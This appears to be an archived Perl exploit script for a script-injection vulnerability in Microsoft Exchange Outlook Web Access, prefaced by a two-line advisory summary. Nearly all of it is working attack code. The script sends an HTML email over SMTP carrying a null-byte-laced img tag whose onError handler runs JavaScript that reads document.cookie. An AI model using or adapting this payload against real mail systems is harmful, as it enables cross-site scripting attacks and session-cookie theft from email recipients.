63 lines
No EOL
1,000 B
Perl
Executable file
63 lines
No EOL
1,000 B
Perl
Executable file
source: https://www.securityfocus.com/bid/18381/info
|
|
|
|
Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability.
|
|
|
|
A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
|
|
|
|
use Net::SMTP;
|
|
|
|
|
|
|
|
my $to = "recipient\@domain.tld";
|
|
|
|
my $sub = "Watch out - Cross Site Scripting Attack";
|
|
|
|
my $from = "originator\@domain2.tld";
|
|
|
|
my $smtp = "mail.example.tld";
|
|
|
|
|
|
|
|
my $cont = "<img alt='hugo\0abc' src='http://www.example.com/
|
|
|
|
imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)'
|
|
|
|
alt='<s'\0";
|
|
|
|
|
|
|
|
$smtp = Net::SMTP->new($smtp);
|
|
|
|
$smtp->mail("$from") || die("error 1");
|
|
|
|
$smtp->to("$to") || die("error 2");
|
|
|
|
|
|
|
|
$smtp->data() ;
|
|
|
|
$smtp->datasend("To: $to\n") ;
|
|
|
|
$smtp->datasend("From: $from\n") ;
|
|
|
|
$smtp->datasend("Subject: $sub\n");
|
|
|
|
$smtp->datasend("Content-Type: text/html\n\n");
|
|
|
|
|
|
|
|
$smtp->datasend("$cont") ;
|
|
|
|
$smtp->datasend("\n\n") ;
|
|
|
|
$smtp->dataend() ;
|
|
|
|
$smtp->quit() ;
|
|
|
|
|
|
|
|
print "$cont\n\ndone\n"; |